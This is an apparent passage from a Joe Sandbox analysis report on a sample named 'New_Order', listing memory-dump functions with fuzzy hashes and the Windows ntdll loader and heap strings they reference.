                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 1404860816-0
                                                                                                • Opcode ID: e79322ec23beae6440c1ac9ca7a7b916ad62d8788581d8cc73f6e4a93d36bda3
                                                                                                • Instruction ID: 3dc7efee8c9d0e2cb5dc2f1ee366847eb20baf004797ccf21a3bb0f8fe911213
                                                                                                • Opcode Fuzzy Hash: e79322ec23beae6440c1ac9ca7a7b916ad62d8788581d8cc73f6e4a93d36bda3
                                                                                                • Instruction Fuzzy Hash: 8B424B75910716DFDB21CF28C841BAAB7F5FF04714F1446ADEA899B241E770AA84CF60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0128A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                • API String ID: 0-379654539
                                                                                                • Opcode ID: fa859f633a1fdb0e255153f268dd408df2a6fd2c9fb539990dd10820b55be0bb
                                                                                                • Instruction ID: 8e336a51a30360ef44588a713fae86136311f94280816272a48810d8d61b032e
                                                                                                • Opcode Fuzzy Hash: fa859f633a1fdb0e255153f268dd408df2a6fd2c9fb539990dd10820b55be0bb
                                                                                                • Instruction Fuzzy Hash: F3C19070529382CFDB11EF58C044B6AB7E4FF84704F04496EFA968B291EB78C945CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • @, xrefs: 012B8591
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012B8421
                                                                                                • LdrpInitializeProcess, xrefs: 012B8422
                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012B855E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1918872054
                                                                                                • Opcode ID: 5ec099d78da415886e0dc3c97f6785032dc639ea8bc5403b75327612658881ae
                                                                                                • Instruction ID: 0804c60f9341033a565e11b036491b4ef189e3555890fb545c9c86a37b0f4483
                                                                                                • Opcode Fuzzy Hash: 5ec099d78da415886e0dc3c97f6785032dc639ea8bc5403b75327612658881ae
                                                                                                • Instruction Fuzzy Hash: 08916B71568346AFD721DA25C881FABBAECEB84794F40092EFB8892151E734D944CB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012F21D9, 012F22B1
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 012F21DE
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012F22B6
                                                                                                • .Local, xrefs: 012B28D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                • API String ID: 0-1239276146
                                                                                                • Opcode ID: 778e4a1bd4ff954e4bd84a62f76bbf46f0f20b6b90a5bf03796cc1419285e205
                                                                                                • Instruction ID: 85e4835f4489595faa9840a43548e71cc99b7e7ecbf3f98f0c38e583d2532ebb
                                                                                                • Opcode Fuzzy Hash: 778e4a1bd4ff954e4bd84a62f76bbf46f0f20b6b90a5bf03796cc1419285e205
                                                                                                • Instruction Fuzzy Hash: C9A1A13592032ADBDB25CF58C8C4BE9B7B4BF59354F2441E9DA08A7251D770AE80CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 012F342A
                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 012F3456
                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 012F3437
                                                                                                • RtlDeactivateActivationContext, xrefs: 012F3425, 012F3432, 012F3451
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                • API String ID: 0-1245972979
                                                                                                • Opcode ID: 773c060cb944599927a8d6073cf81657b2fadc4110dc6b9f1e54dd11f4471ec7
                                                                                                • Instruction ID: 121e17ec094ff4160752f2f420a63de79e1b62ea89bedae30c1243954eca0c2f
                                                                                                • Opcode Fuzzy Hash: 773c060cb944599927a8d6073cf81657b2fadc4110dc6b9f1e54dd11f4471ec7
                                                                                                • Instruction Fuzzy Hash: 486126366306429BD722DE1CC8C1B66F7E4FF90B90F14452DEA569B282D770E840CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 012E1028
                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 012E106B
                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 012E0FE5
                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012E10AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                • API String ID: 0-1468400865
                                                                                                • Opcode ID: a2aa9f911141c4f2fa311c55fbdd2ea8be39000cdbb6c25097e1b366ea39575e
                                                                                                • Instruction ID: 202f86eccd95db8af65182a60b4c47ae7173cb64b7eeec549525635e65038c14
                                                                                                • Opcode Fuzzy Hash: a2aa9f911141c4f2fa311c55fbdd2ea8be39000cdbb6c25097e1b366ea39575e
                                                                                                • Instruction Fuzzy Hash: 3571D4B15243069FCB21EF18D885BAB7FE8AF54754F400568FA488B286D774D588CBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 012F365C
                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 012F362F
                                                                                                • LdrpFindDllActivationContext, xrefs: 012F3636, 012F3662
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 012F3640, 012F366C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 0-3779518884
                                                                                                • Opcode ID: def31b8d2c1fb5f1ea41c659705feaf475af2825b9bfd3775c75e3d2f521267e
                                                                                                • Instruction ID: 22df1eeef5c18d89ffd52f7028f1b1c6cc4d6ef2094e710535cdb0fa81c6e2d3
                                                                                                • Opcode Fuzzy Hash: def31b8d2c1fb5f1ea41c659705feaf475af2825b9bfd3775c75e3d2f521267e
                                                                                                • Instruction Fuzzy Hash: 1331DB32A30693AEEF36FB1CC8C9BB5B6A8BB017D4F064129D70657153D7A09D80C795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012EA9A2
                                                                                                • LdrpDynamicShimModule, xrefs: 012EA998
                                                                                                • apphelp.dll, xrefs: 012A2462
                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 012EA992
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-176724104
                                                                                                • Opcode ID: b965af560347d0b8ab7f530f28cb374838907062dcf45b3444cc19b171f40b63
                                                                                                • Instruction ID: dc86feef043b00eb374fbbad0055c3028d1ac86b0af9b65c3ea9a141801b82ed
                                                                                                • Opcode Fuzzy Hash: b965af560347d0b8ab7f530f28cb374838907062dcf45b3444cc19b171f40b63
                                                                                                • Instruction Fuzzy Hash: 35310975620302EBEB319F5DD88AABABBFDFB84714F56001DEA1167355C7B09981CB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0129327D
                                                                                                • HEAP: , xrefs: 01293264
                                                                                                • HEAP[%wZ]: , xrefs: 01293255
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                • API String ID: 0-617086771
                                                                                                • Opcode ID: ceabdd04b3a925b0bbdd2863460a1b8630b59aa175eeca60d38d29a4d95dd1b3
                                                                                                • Instruction ID: 232c805e1d64e19ce7a010c39743a67fbfc9dacb4a6f3e85b2109cb907fecb8b
                                                                                                • Opcode Fuzzy Hash: ceabdd04b3a925b0bbdd2863460a1b8630b59aa175eeca60d38d29a4d95dd1b3
                                                                                                • Instruction Fuzzy Hash: CD92AA71A2424ADFEF25CFACC4407AEBBF1FF08300F188069E959AB291D774A945CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01290770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-4253913091
                                                                                                • Opcode ID: 868e0f610db5a395074d316b9a8c9207dd3fdbf2df9c457c72aa668dbce123d2
                                                                                                • Instruction ID: 98a056a5a18366298c6dd7e4aa1e22b51dc0071dfcee972884f40ea0afce4c15
                                                                                                • Opcode Fuzzy Hash: 868e0f610db5a395074d316b9a8c9207dd3fdbf2df9c457c72aa668dbce123d2
                                                                                                • Instruction Fuzzy Hash: 00F1CC34A2060ADFEB25CF6CC894B6AB7F9FF44708F144168E6169B381D774E981CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $@
                                                                                                • API String ID: 0-1077428164
                                                                                                • Opcode ID: 61d09a3505b3b67ce844b9ed368c1d1aae66c0f16d23161a809e10e311700c82
                                                                                                • Instruction ID: d2b64f7af5a9b0798d6e08e0917c8dbb07fd175e00fb70ac2ee0bacbd1ffea82
                                                                                                • Opcode Fuzzy Hash: 61d09a3505b3b67ce844b9ed368c1d1aae66c0f16d23161a809e10e311700c82
                                                                                                • Instruction Fuzzy Hash: EAC290716283429FEB25CF68C841BABBBE5BF88704F44892DFA89C7241D775D805CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                • API String ID: 0-2779062949
                                                                                                • Opcode ID: 6d6355de1f9a602fcd07db6f9ebad7d3eaf9a280e1bbf59338c227c6ff9a438d
                                                                                                • Instruction ID: 9d13ea30e84a211d749d85e428195812878c8e0cacfa003675e0ea3f11dd89c4
                                                                                                • Opcode Fuzzy Hash: 6d6355de1f9a602fcd07db6f9ebad7d3eaf9a280e1bbf59338c227c6ff9a438d
                                                                                                • Instruction Fuzzy Hash: 36A1617196162A9BDB31DF68CC88BEAB7B8EF44710F1041E9DA08A7250DB359E84CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012EA121
                                                                                                • LdrpCheckModule, xrefs: 012EA117
                                                                                                • Failed to allocated memory for shimmed module list, xrefs: 012EA10F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-161242083
                                                                                                • Opcode ID: 44af6d450120e44cf7c99f2f5d93cff5f14f187c6f30759df022c536b88f6464
                                                                                                • Instruction ID: 9dee890550f88f3258d9604ebc011b9a64db4e1977811505493399b9a24c82fb
                                                                                                • Opcode Fuzzy Hash: 44af6d450120e44cf7c99f2f5d93cff5f14f187c6f30759df022c536b88f6464
                                                                                                • Instruction Fuzzy Hash: 9C71DE70A20206DFDB25DF68C985BBEBBF9FB84704F54402DEA02AB251E774AD41CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01290A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-1334570610
                                                                                                • Opcode ID: 87c6eebe28dc031cb8a76d65759fbbdcc88b5a3df5a3105556b6aa061f1f5317
                                                                                                • Instruction ID: 5c8668ef41d995b96052d28958c80c6ef427aeea8de274b383c9c331dca42109
                                                                                                • Opcode Fuzzy Hash: 87c6eebe28dc031cb8a76d65759fbbdcc88b5a3df5a3105556b6aa061f1f5317
                                                                                                • Instruction Fuzzy Hash: 4361F170620306DFDB29CF2CC495B6ABBE9FF44308F148559E5598F292D7B4E881CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012F82E8
                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 012F82DE
                                                                                                • Failed to reallocate the system dirs string !, xrefs: 012F82D7
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-1783798831
                                                                                                • Opcode ID: afe1237939a57a9c747cdd5911d14d18aca458649fdfa84b05a1002c2a0d5374
                                                                                                • Instruction ID: e68e19a185fdf32a5deea9d037a79a541c8d4647d1a0f93f39754a27b342f7f2
                                                                                                • Opcode Fuzzy Hash: afe1237939a57a9c747cdd5911d14d18aca458649fdfa84b05a1002c2a0d5374
                                                                                                • Instruction Fuzzy Hash: 7941F3B1564706ABD735EB68D885BABB7ECEF44760F00452AFA4497290E770E8008B91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0133C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • @, xrefs: 0133C1F1
                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0133C1C5
                                                                                                • PreferredUILanguages, xrefs: 0133C212
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                • API String ID: 0-2968386058
                                                                                                • Opcode ID: b5689810567d6d110ba5a3ea1ec56ae3bb7def6016f5aab9cf8d5f776f94097a
                                                                                                • Instruction ID: 0c92172cf75d247ad69badbde936b80441b3ecdbce713a1d889dc05530dee7ab
                                                                                                • Opcode Fuzzy Hash: b5689810567d6d110ba5a3ea1ec56ae3bb7def6016f5aab9cf8d5f776f94097a
                                                                                                • Instruction Fuzzy Hash: 60415372E10219EFDF11DAD8C851FEEBBB8AB54704F14416BEA09F7240D7749A44CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01314144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                • API String ID: 0-1373925480
                                                                                                • Opcode ID: 8409a43d9d42984d0b4e95c3cccea64612331a6b0aa33a6cef9ae02657b5c5f4
                                                                                                • Instruction ID: ccd94a54bf70d026efced282ce51b081c9e26771d72479c525d963f36668481f
                                                                                                • Opcode Fuzzy Hash: 8409a43d9d42984d0b4e95c3cccea64612331a6b0aa33a6cef9ae02657b5c5f4
                                                                                                • Instruction Fuzzy Hash: 2B412631A10658CBEB2ADBE8C854BEDBBF8FF55348F240469D901EB785D7348942CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01304755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01304899
                                                                                                • LdrpCheckRedirection, xrefs: 0130488F
                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01304888
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-3154609507
                                                                                                • Opcode ID: 9fbbaaa5326a789da7a07c6c5c4ffbc22cda4ad34222bbff004011dd7699d10d
                                                                                                • Instruction ID: 4bbcf6cc8c90e69d9048d1eb29f7c9dbad4dfb3acb370d2a0107994bb3206343
                                                                                                • Opcode Fuzzy Hash: 9fbbaaa5326a789da7a07c6c5c4ffbc22cda4ad34222bbff004011dd7699d10d
                                                                                                • Instruction Fuzzy Hash: 9841D332A006519FDB23CF1CD860A26BFE8AF89A58F05095DEF5997691D331DA00CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01290BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-2558761708
                                                                                                • Opcode ID: 3adfc75ddf268d510bcbbc5c8f30f888d5c7bb654d9375073e1ce9d98e19bc6c
                                                                                                • Instruction ID: 32100baf2f598160618fdf5e99d976a1c64309e503c79ff4e744aeb94d6221b0
                                                                                                • Opcode Fuzzy Hash: 3adfc75ddf268d510bcbbc5c8f30f888d5c7bb654d9375073e1ce9d98e19bc6c
                                                                                                • Instruction Fuzzy Hash: 9411E131334146DFDB29DE1CC8AAB7AB3E8EF40619F588129F506CB251EB70D840C755
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01302104
                                                                                                • Process initialization failed with status 0x%08lx, xrefs: 013020F3
                                                                                                • LdrpInitializationFailure, xrefs: 013020FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2986994758
                                                                                                • Opcode ID: 5632949af90bb96f81a40b064dd81431eb4a930c4331da73d842cc7de40fbe34
                                                                                                • Instruction ID: 274c4a58d772188ccbca86b0eed8ad7d483f4d7ea80cb2854df3dd8f02d47b7d
                                                                                                • Opcode Fuzzy Hash: 5632949af90bb96f81a40b064dd81431eb4a930c4331da73d842cc7de40fbe34
                                                                                                • Instruction Fuzzy Hash: 5AF0C235650348AFE739E64CCC56FAA77ADEB80B58F500069FB40772C5D2B0A940CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID: #%u
                                                                                                • API String ID: 48624451-232158463
                                                                                                • Opcode ID: 8e4d800c72e8b6b053b4b3054b6320a3f2742d2fe391a75e1ca17076e445659b
                                                                                                • Instruction ID: aa66a47a6be91b410f3ea384228755d455b93b70cef13f9cb8e21a46e73051cd
                                                                                                • Opcode Fuzzy Hash: 8e4d800c72e8b6b053b4b3054b6320a3f2742d2fe391a75e1ca17076e445659b
                                                                                                • Instruction Fuzzy Hash: 4A715771A1014A9FDF05DFA8C994BAEB7F8FF08704F144069EA05E7251EA34EE01CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0128A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • LdrResSearchResource Enter, xrefs: 0128AA13
                                                                                                • LdrResSearchResource Exit, xrefs: 0128AA25
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                • API String ID: 0-4066393604
                                                                                                • Opcode ID: aba65bb2565d0a8d7db38d6e67729bac2d2aa610cf29dd5f6986ce68398a7a2d
                                                                                                • Instruction ID: 33d0a6f442e3f0102e0b7707a97f0f0f6237b075b28a3293d99d77d23d02a5cc
                                                                                                • Opcode Fuzzy Hash: aba65bb2565d0a8d7db38d6e67729bac2d2aa610cf29dd5f6986ce68398a7a2d
                                                                                                • Instruction Fuzzy Hash: D8E18571E2121ADFEF21DF99C944BAEBBB9BF14310F144426EA01E7291EB74D941CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
